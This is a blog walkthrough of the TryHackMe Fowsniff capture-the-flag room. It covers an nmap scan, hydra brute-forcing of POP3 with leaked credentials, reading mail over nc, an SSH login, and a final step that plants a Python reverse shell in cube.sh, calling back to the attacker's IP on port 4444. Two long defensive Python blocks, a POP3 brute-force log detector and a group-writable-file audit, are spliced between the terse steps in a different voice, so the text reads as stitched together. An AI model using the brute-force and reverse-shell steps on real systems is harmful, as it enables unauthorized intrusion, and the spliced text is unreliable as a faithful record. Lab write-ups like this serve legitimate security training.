TryHackMe Fowsniff 1 room walkthrough

HinaK
3 min read, Jun 10, 2021

This is a write-up covering the steps taken to solve a beginner-level security challenge, the fowsniff 1 room on the TryHackMe platform.

This blog is written as part of the Masters Certification in Red Team Program from HackerU.

Step 1: Connect to TryHackMe and start the target machine.

  1. Download the OpenVPN configuration file from the TryHackMe platform.
  2. Connect to TryHackMe by running the command in a Kali terminal:

sudo openvpn /pathtoOVPNfile.ovpn

  3. Start the machine in the 'fowsniff 1' room; the target IP address will be displayed within a minute.

https://tryhackme.com/room/ctf

Step 2: Information gathering using Nmap

  1. Start an nmap scan of the target IP:

nmap -A -O <target ip>

Step 3: Detailed Findings

Open ports:

22 : SSH

80 : http Apache httpd 2.4.18

110 : pop3 Dovecot pop3d

143 : imap Dovecot imapd

  1. Navigating to robots.txt: no details found.

  2. Viewing the page on port 80 revealed Twitter account details.

  3. Visiting the Twitter account found on the page led to a Pastebin link with credentials.

  4. Following the Pastebin link revealed credentials with hash values.

  5. Created two files, users.txt and pass.txt, from the cracked hash values.

  6. Since the POP3 service is available, brute-forced it with the found username and password lists, which yielded a valid POP3 username and password:

hydra pop3://10.10.169.67 -L users.txt -P pass.txt
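From the defender's side, a wordlist attack like the one above leaves a dense run of failed authentications in the mail server's log. The following Python is an added example (not code from the write-up or the room) that parses Dovecot pop3-login log lines, flags a source IP that exceeds a failure threshold inside a sliding time window, and flags a later successful login from that same source, which is the pattern that matters most. The log lines are constructed for this example: they follow Dovecot's default "auth failed" and "Login" message layout, but the hostnames, usernames, session ids and timestamps are made up, and the threshold and window are assumed tuning values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed Dovecot pop3-login log lines (not taken from the room or the
# write-up). Layout follows Dovecot's default messages; names and ids are made up.
SAMPLE_LOG = """\
Jun 10 10:00:01 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice>, method=PLAIN, rip=10.8.131.223, lip=10.10.169.67, session=<s1>
Jun 10 10:00:02 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice>, method=PLAIN, rip=10.8.131.223, lip=10.10.169.67, session=<s2>
Jun 10 10:00:03 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<bob>, method=PLAIN, rip=10.8.131.223, lip=10.10.169.67, session=<s3>
Jun 10 10:00:04 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<bob>, method=PLAIN, rip=10.8.131.223, lip=10.10.169.67, session=<s4>
Jun 10 10:00:05 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<carol>, method=PLAIN, rip=10.8.131.223, lip=10.10.169.67, session=<s5>
Jun 10 10:00:06 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<carol>, method=PLAIN, rip=10.8.131.223, lip=10.10.169.67, session=<s6>
Jun 10 10:00:09 mail dovecot: pop3-login: Login: user=<carol>, method=PLAIN, rip=10.8.131.223, lip=10.10.169.67, mpid=2201, session=<s7>
Jun 10 10:15:30 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 4 secs): user=<dave>, method=PLAIN, rip=10.10.10.5, lip=10.10.169.67, session=<s8>
Jun 10 10:15:41 mail dovecot: pop3-login: Login: user=<dave>, method=PLAIN, rip=10.10.10.5, lip=10.10.169.67, mpid=2300, session=<s9>
"""

# syslog timestamp, host, then either a successful "Login" or an auth failure;
# we only need the outcome, the user and the remote IP (rip=).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>, "
    r".*?rip=(?P<rip>[\d.]+)"
)


def parse_line(line):
    """Return a dict with ts/ok/user/rip for a pop3-login line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # year-less syslog time
    return {"ts": ts, "ok": m.group("event") == "Login",
            "user": m.group("user"), "rip": m.group("rip")}


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return alerts as (rip, kind, detail).

    kind == "burst": at least `threshold` failures from one source within
    `window_s` seconds (a wordlist attack, as opposed to a mistyped password).
    kind == "success_after_burst": a successful login from a source that
    was already flagged, i.e. the guessing most likely worked.
    """
    recent = defaultdict(deque)  # rip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["rip"]]
        if not ev["ok"]:
            q.append(ev["ts"])
            while q and (ev["ts"] - q[0]).total_seconds() > window_s:
                q.popleft()  # slide the window forward
            if len(q) >= threshold and ev["rip"] not in flagged:
                flagged.add(ev["rip"])
                alerts.append((ev["rip"], "burst",
                               f"{len(q)} POP3 auth failures within {window_s}s"))
        elif ev["rip"] in flagged:
            alerts.append((ev["rip"], "success_after_burst",
                           f"login as {ev['user']} after brute-force burst"))
    return alerts


if __name__ == "__main__":
    for rip, kind, detail in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{rip} {kind}: {detail}")
```

On the constructed log this reports one burst from 10.8.131.223 and then the login as carol from the same address; the single failure from 10.10.10.5 followed by a normal login stays below the threshold and is not reported. Feeding real Dovecot logs through the same function only requires reading them line by line.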

  7. Connect to the POP3 service using nc on port 110:

nc 10.10.169.67 110

  8. Reading the messages: found a temporary SSH message.

retr 1

retr 2

Found a hint for the SSH user login.

  9. Trying to log in through SSH:

ssh baksteen@10.10.169.67

  10. Searching for files that belong to the users group:

find / -group users -type f 2>/dev/null
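The find command above lists every regular file owned by the users group; what makes such a file dangerous is when it is also group-writable and executed by something else, which is the case the write-up goes on to exploit with cube.sh. The following Python is an added example (not code from the write-up or the room) that generalises the check into a small audit: it walks a directory tree, reports regular files owned by a given group that carry the group-write bit, and separately reports the subset that is also executable. The directory tree it inspects is constructed in a temporary directory with made-up file names and modes (cube.sh is reused only as a familiar name); the group id is read back from a file the example creates, so it runs offline with any user.

```python
import os
import stat
import tempfile


def group_writable_files(root, gid):
    """Regular files under root owned by group `gid` with the group-write
    bit set: any member of that group can change their contents."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries are skipped, like 2>/dev/null
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets etc. are not interesting here
            if st.st_gid == gid and st.st_mode & stat.S_IWGRP:
                hits.append(path)
    return sorted(hits)


def executable_and_group_writable(root, gid):
    """The subset that is also executable by someone: a script any group
    member can edit and that another process or user may later run."""
    exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    return [p for p in group_writable_files(root, gid)
            if os.lstat(p).st_mode & exec_bits]


def demo():
    """Build a constructed tree (not the room's filesystem) and audit it."""
    root = tempfile.mkdtemp(prefix="group-audit-")
    # Constructed cases: name -> mode. Only cube.sh is both group-writable
    # and executable, which is the finding a hardening review should flag.
    cases = {
        "cube.sh": 0o775,    # rwxrwxr-x: group can edit, anyone can run
        "notes.txt": 0o664,  # rw-rw-r--: group can edit, nobody runs it
        "safe.sh": 0o755,    # rwxr-xr-x: runnable but only the owner writes
    }
    for name, mode in cases.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho hello\n" if name.endswith(".sh") else "notes\n")
        os.chmod(path, mode)
    # Use the group the files actually received (a setgid parent directory
    # could make it differ from os.getgid()).
    gid = os.lstat(os.path.join(root, "cube.sh")).st_gid
    return {
        "writable": [os.path.basename(p) for p in group_writable_files(root, gid)],
        "writable_exec": [os.path.basename(p)
                          for p in executable_and_group_writable(root, gid)],
    }


if __name__ == "__main__":
    for kind, names in demo().items():
        print(kind, names)
```

Run against a real host with `group_writable_files("/", grp.getgrnam("users").gr_gid)`, the "writable_exec" list is the one to review first: each entry is a script whose integrity depends on every member of the group.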

  11. Update cube.sh with the Python reverse-shell code below, start a listener on Kali, and then execute the script:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.131.223",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Run ./cube.sh

Got the flag!

With these steps, I was able to answer all questions posted in the fowsniff 1 room on TryHackMe.

Thank you for reading this blog.
